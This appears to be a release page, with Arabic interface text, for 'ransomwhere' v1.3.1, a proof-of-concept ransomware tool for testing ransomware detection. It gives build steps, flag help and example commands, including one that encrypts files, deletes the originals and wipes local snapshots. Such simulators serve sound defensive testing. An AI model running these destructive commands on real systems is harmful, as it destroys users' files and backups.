العودة إلى التحديثات
New releaseAug 20, 2026

ransomwhere v1.3.1

عينة من برمجية فدية (PoC) لاختبار استراتيجية الاستجابة لبرمجيات الفدية لديك.

مشاركة

Ransomwhere

نموذج إثبات مفهوم لبرنامج فدية يقوم بتشفير ملفاتك لاختبار استراتيجيات اكتشاف ومنع برامج الفدية. إذا لم يتم توفير أي معاملات، فسيقوم ransomwhere تلقائيًا بتنفيذ وضع encrypt دون حذف الملفات الأصلية.

أنا لست مسؤولًا عن أي ضرر ناتج عن استخدام هذا البرنامج.

البناء

# with make and Go installed
% make build

الاستخدام

% ransomwhere -h
Usage of ransomwhere:
  -delete
        Delete files after encrypting.
  -log string
        The log level to use. (default "error")
  -mode string
        Encrypt or decrypt the ransomware files. (default "encrypt")
  -path string
        Path to the directory where to traverse files to ransom. (default "/Users/niels")
  -wipe
        Wipe local snapshots while encrypting.

أمثلة

# straight from source, encrypt in our home directory
% make FLAGS="-log=warn -delete=false -mode=encrypt"

# from the binary, encrypt /home/ransom/
% ./app -log=warn -delete=false -mode=encrypt -path=/home/ransom/

# encrypt, delete original files and wipe backups like a real ransomware (DANGEROUS)
% ./app -delete=true -wipe=true

# revert the ransom operation and restore any files
% ./app -mode=decrypt

الفئات